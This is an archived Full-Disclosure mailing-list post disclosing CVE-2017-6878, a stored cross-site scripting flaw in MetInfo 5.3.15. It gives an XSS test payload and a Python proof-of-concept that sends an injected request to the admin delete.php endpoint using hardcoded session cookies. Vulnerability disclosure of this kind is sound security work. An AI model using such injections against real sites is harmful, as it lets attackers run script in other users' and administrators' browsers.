lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <5fb9fe09.b91f.15add2d7bd8.Coremail.callarice@163.com> Date: Sat, 18 Mar 2017 00:50:29 +0800 (CST) From: 陈彦羽 <callarice@....com> To: fulldisclosure@...lists.org Subject: [FD] [CVE-2017-6878]:MetInfo5.3.15 Stored Cross Site Scripting Hello: The following is my application vulnerabilities. --------------------------------------- --------------------------------------- [CVE-2017-6878]:MetInfo5.3.15 Stored Cross Site Scripting Application: MetInfo Versions Affected: 5.3.15 Vendor URL: http://www.metinfo.cn/ Software Link:http://www.metinfo.cn/upload/file/MetInfo5.3.zip Bugs: Stored XSS Author:Arice.chen(DBAPPSecurity Ltd) Description: MetInfo was established in March 2009, is a enterprise CMS, more than 40 m enterprises in the use of MeInfo build their own enterprise website. Vulnerability details: To modify, add a message in problem position insert JavaScript test code <img src=x onerror=alert(1)> Then the background access to relevant pages, or other users access to the front desk page will make the attack code is executed. --------------------------------------------- E-mail:callarice@....com DBAppSecurity Ltd www.dbappsecurity.com.cn POC: import requests url = "http://192.168.0.28/MetInfo5.3/admin/column/delete.php?anyid=25&lang=cn&ajaxmetinfo=1&no_order_2=1&name_2=1<img src=x onerror=alert(2)>&nav_2=1&index_num_2=0&action=editor&lang=cn&anyid=25&allid=2," headers = { "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50", } cookies = dict(PHPSESSID="9o2pth5a43hpj23nflnc7lfi24", recordurl="", met_auth="dfc7PoNLWryZ6Bu2hOEqxsEzRwMf3Nc%2BYqOWCxrSuQ2SivQF%2Fwfo0OP4JEP%2F7QakKJaXa46h5BB3nqrtt58caQaJcQ", met_key="pnZh0Fw", langset="cn", upgraderemind="1", tablepage_json="0%7Cuser%2Cadmin_user%2Cdojson_user_list" ) s = requests.get(url,cookies=cookies,headers=headers,timeout=10,verify=False) if s.status_code==200: print 'Success' Use this POC needs to obtain the cookie after login, because insert JavaScript place in the background. The problem find is delete.php?name_2= payload is :<img src=x onerror=alert(2)> If after the success of the insert JavaScript, to several places in the background and other users access to the front desk page to attack code execution _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists